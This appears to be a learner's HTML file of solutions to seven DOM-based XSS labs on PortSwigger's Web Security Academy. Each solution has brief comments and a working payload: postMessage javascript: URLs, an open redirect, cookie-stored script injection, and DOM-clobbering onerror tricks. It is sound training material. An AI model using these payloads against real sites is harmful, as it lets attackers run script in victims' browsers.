



<!-- answer for dom corss site scripting 1 -->

<!-- this worked because the script in the lab takes the url input of window.postMessage as a string and then searchs for two keywords http: or https: in that string -->

<!-- After a it finds the keyword (http: or https:) it then procced to assign the input string as url. there for doing window.postMessage(javascript:print()//http:','*')-->

<!-- Will work because it executes the javascript in function in that url  -->

<iframe src="https://0a50003603b323d68389653d000b0091.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:print()//http:','*')">





    <!-- answer for dom cross site scripting 2 -->
    
    <!-- Same idea but the differece is now, Is the lab takes the input and if the keywords http: or https: present it will redirect to that string as a url page -->
    
    <iframe src="https://0a0b00d9046c4736c4e8fe4e002600cd.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:print()//http:','*')"></iframe>
    
    
    
    <!-- Answer for dom cross site scripting 3 -->
     
    <!-- In this lab it reads the json and from there construcrts the iframe acorrding the the switch case in the script in the website -->
    
    <iframe src="https://0a52001104dc710c83b4e75400fe007d.web-security-academy.net" 
            onload="this.contentWindow.postMessage(JSON.stringify({type:'load-channel',url:'javascript:print()'}), '*')">
    </iframe>
    
    
    
    <!-- Answer for dom cross site scripting 4 -->
    
    <!-- In this lab there is a script that uses regex to check if the paramter url= has http or https before :// and  if so it checks if there is any characters after it -->
    
    <!-- for example: https://regular-website/?url=https://attacker-website.com - this will be placed as the url to be redirected from the regular website to the attack website -->
    
    <!--Note this attack is called open redirect -->
    
    
    https://0ac7006003fa0cc383e51a080096003f.web-security-academy.net/post?postId=6&url=https://put-your-exploit-server-here
    
    
    
    
    
    
    <!-- Answer for dom cross site scripting 5 -->
    
    <!-- In this lab there is a script that writes visited post to the cookie of the website, To exploit this we need to get out of the url <a> tag and then write XSS as shown -->
    
    <!--After pressing enter in the url bar this value is stored in the cookie and the print() runs. -->
    
    <!-- In the iframe the onload is used to redirect the user browser AFTER the XSS has ran on the user browser without him knowing he gets redirected to the main page -->
    
    <!-- The if(window.x - value not set) then set value to this.src=url after that window.x=1 - end the redirection (Prevent inifite loop of redirections)-->
    
    <iframe src="https://0a8400c50480130880ba718300230066.web-security-academy.net/product?productId=1&'><script>print()</script>" 
    onload="if(!window.x)this.src='https://0a8400c50480130880ba718300230066.web-security-academy.net';window.x=1;"></iframe>
    
    
    
    
    <!-- Answer for dom cross site scripting 6 -->
    
    <!--In this lab you need to exploit a variable that creates html elements (src for img) using cid allows to inject onerror since the src will lead to that -->
    
    <!-- IMPORTANT reading the code and understanding it is very curical for finding exploits -->
    
    <a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:hello&quot;onerror=&quot;alert()"></a>
    
    
    <!-- Answer for dom cross site scripting 7 -->
    
    <!--In this lab same kind of idea from lab 6 but now there is a libary that uses the attribautes (Js dom element) so putting for example -->
    
    <!-- <form onclick="alert(1)" id="XSS"/><input id=attribautes/> - the code will ignore the unallowed attriabutes such onclick and its value. Because of the usage of attribautes -->
    
    <!-- Because it will get attriabutes- so it will ignore the rest of the unallowed things (failer in the loop checker because of using this attriabutes in properly)  -->
    
    <!-- IMPORTANT reading the code and understanding it is very curical for finding exploits -->
    
    <iframe src="https://0af800bd0411b14f83f1cefd00d8008e.web-security-academy.net/post?postId=6" onload="setTimeout(()=>this.src=this.src+'#X',500)"></iframe>
    
    